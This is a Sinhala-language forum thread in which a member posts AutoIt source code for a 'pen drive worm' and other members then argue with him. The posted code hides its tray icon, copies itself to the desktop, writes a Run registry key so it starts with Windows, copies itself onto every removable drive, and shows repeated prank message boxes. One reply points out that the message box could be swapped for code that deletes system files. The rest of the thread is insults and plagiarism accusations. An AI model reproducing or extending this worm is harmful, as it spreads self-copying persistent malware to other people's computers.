AutoIt වලින් පෙන් වෝර්ම් කට්ටක් හදමු

dragon3rz

Member
Dec 11, 2010
411
85
0
AutoIt වලින් පෙන් වෝර්ම් කට්ටක් හදමු

අදත් කියල දෙන්නම් පොඩි කෝර්ඩ් එකක් මම ඔයාලට මේ දැනුම දෙන්නෙ නරකට යොදා ගන්න නෙවෙයි හොද පැත්තකට යොදවන්න කියල උදාහරණයක් විදියට වයිරස් ගාර්ඩ් හදන්නෙත් වයිරස් ගැන හොදට දන්න කියන කට්ටිය කලින් මතකද මම පොඩි වෝර්ම් එකක් හදන්න කියල දුන්න රෙප් වලින් මට ගොඩක් අය බැන්න සමහර විට ඒ සුද්දන්ට දෙන අය උන් කැමති නෑ අපේ එකෙක් කොර්ඩ් පැත්තකින් ඉස්සරහට එනවට
ඇත්තම කියනව නම් පොඩි කාලෙ මට ගොඩක් ආසාව තිබුනෙ කවද හරි වයිරස් කට්ටක් හදන්න ඉතින් ඔහොම යනකොට කෝර්ඩ් පැත්තට ආස හිතුන වැරදුන වාර අනන්තයි එකම වැරද්ද දෙසැරයක් කරෙ නම් නෑ
ඔන්න කට්ටිය හිතන්න එපා මෙන්න මුට පිස්සු මුගෙ ජීවන කතාව කියවනව කියල එහෙම හිතන්න එපා වැඩි කතා එපා.මම කෙලින්ම කෝර්ඩ් එක දෙන්නම් මූලික දැනුම කලින් කලින් වෝර්ම් එකේ තියනව!
මෙන්න කෝර්ඩ් එක මේක ඇවිල්ල පෙන් එකකට කොපි වෙන්න සරලව කිව්වොත් වෝර්ම් කට්ටක් (චෙක් කරල බලන්න විනාශකාරී ක්‍රියාවන් අන්තර් ගත නැත උදාහරණ පමනි!)

Opt("TrayIconHide", 1)
FileCopy(@ScriptFullPath,@DesktopDir & "\"&@MSEC&"Dragon3rz.exe")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run","Dragon3rz", "REG_SZ", @ScriptFullPath)
$var = DriveGetDrive( "REMOVABLE" )

If NOT @error Then
For $i = 1 to $var[0]
FileCopy(@ScriptFullPath,$var[$i])
Next
EndIf

sleep(5000)
MsgBox(4096,"ado","yaman bando wesak balanna!")

$i = 0
Do
MsgBox(4096,"ado","yaman bando wesak balanna!")
Sleep(5000)
$i = $i + 1
Until $i = 20

වැඩේ හොදයි නම් රෙප් පාරක් දෙන්න වැඩේ නරත නම් රෙප් කපන්න කට්ටිය අකමැති නම් ආයෙමත් මම මේ දේවල් ඔයලට කියල දෙන්නෙ නෑ මේක නවත්තනව.
(උපුටා ගෙන අතන මෙතන දාන්න නම් තහනම් ඔං කිව්වා)
අනිත් අයට බලන්න බම්ප් දමන්න කමෙන්ට් දෙන්න!

ඔබ සැමට ස්තූතියි!නැවත හමු වෙමු!
 
Last edited:

sachith19920726

Well-known member
  • Jan 20, 2011
    35,670
    11,505
    113
    33
    Crynet Solutions
    bit.ly
    වැඩේ නම් හොදයි තමා බන් !

    එත් ටිකක් කල්පනා කරපන්.. අපිනම් viruses හදන්න මොනතරම් දැනුම තිබුනත් එහෙම කරන්නෙ නෑ..
    එත් මේ cording එක පිස්සෙක් අතට ගියොත් !
    සහ ඒ පිස්සට vbscripts ගැන පොඩි හරි දැනුමක් තිබුනොත් !
    මේකේ තියන msgbox එක වෙනුවට ඌ system files delete කරන්න cording එක වෙනස් කලොත් !:no:

    ටිකක් හිතපන්..
    ඒක නිසා ඔය තියන දැනුම තව improve කරගෙන හොද දෙයක් කරපන් !
     
    dragon3rz

    Member
    Dec 11, 2010
    411
    85
    0
    hy

    sorry me vb scripts newei,:lol::lol::lol::lol::lol::lol::lol::lol:
    mama mage denuma kaatath bedala denawa,awa hadata ho narakata use karana eka eyalage kemaththa,mama dekka elakiri wala godak aya hacking thread damala thiyanawa ,oya kemathi deyak oyata kiyanna puluwan,hodama de oyath monawa hari deyak dannawa nam eka karalama pennanna nikan kiyawana ayata ek fnd sla kemathi naha..
     
    sachith19920726

    Well-known member
  • Jan 20, 2011
    35,670
    11,505
    113
    33
    Crynet Solutions
    bit.ly
    sorry me vb scripts newei,:lol::lol::lol::lol::lol::lol::lol::lol:
    mama mage denuma kaatath bedala denawa,awa hadata ho narakata use karana eka eyalage kemaththa,mama dekka elakiri wala godak aya hacking thread damala thiyanawa ,oya kemathi deyak oyata kiyanna puluwan,hodama de oyath monawa hari deyak dannawa nam eka karalama pennanna nikan kiyawana ayata ek fnd sla kemathi naha..

    http://sachith.webstarts.com/

    අපි නම් උබවගේ ගොබ්බ වැඩ කර කර කාලෙ කන්නෙ නෑ !:P:P:P:P:P:P:P
     
    dragon3rz

    Member
    Dec 11, 2010
    411
    85
    0
    he he

    http://sachith.webstarts.com/

    අපි නම් උබවගේ ගොබ්බ වැඩ කර කර කාලෙ කන්නෙ නෑ !:P:P:P:P:P:P:P

    අපි නම් උබ වගේ වෙන අය ලියපු කෝර්ඩ් මගේ කියාගෙන කවුරුවත් අන්දන්නෙ නෑ.මිනිහෙක් වගේ තමන්ම ප්‍රෝගෑම් හදපන් උබගෙ මහ ලොකු නෝට් පෑඩ් එකේ සෝර්ස් එක මගෙ ගාවත් තියනව.අනුන්ගෙ ඒවට ඇවිත් කාලෙ කන්නෙ නැතුව ඉදපන්:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P
     
    sachith19920726

    Well-known member
  • Jan 20, 2011
    35,670
    11,505
    113
    33
    Crynet Solutions
    bit.ly
    අපි නම් උබ වගේ වෙන අය ලියපු කෝර්ඩ් මගේ කියාගෙන කවුරුවත් අන්දන්නෙ නෑ.මිනිහෙක් වගේ තමන්ම ප්‍රෝගෑම් හදපන් උබගෙ මහ ලොකු නෝට් පෑඩ් එකේ සෝර්ස් එක මගෙ ගාවත් තියනව.අනුන්ගෙ ඒවට ඇවිත් කාලෙ කන්නෙ නැතුව ඉදපන්:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P:P

    අඩේ ඔව් නෙ ! උබ එදා !@# ගන්න අපු වෙලාවේ මට අහන්න බැරි උනා මොකටද පෙන් ඒක ගැහුවේ කියල !

    මම හදපු software වල source codes කොහොමද යකෝ තෝ ලගට ගියේ..

    නිකන් පුක දෙන්නැතුව හිටපන් !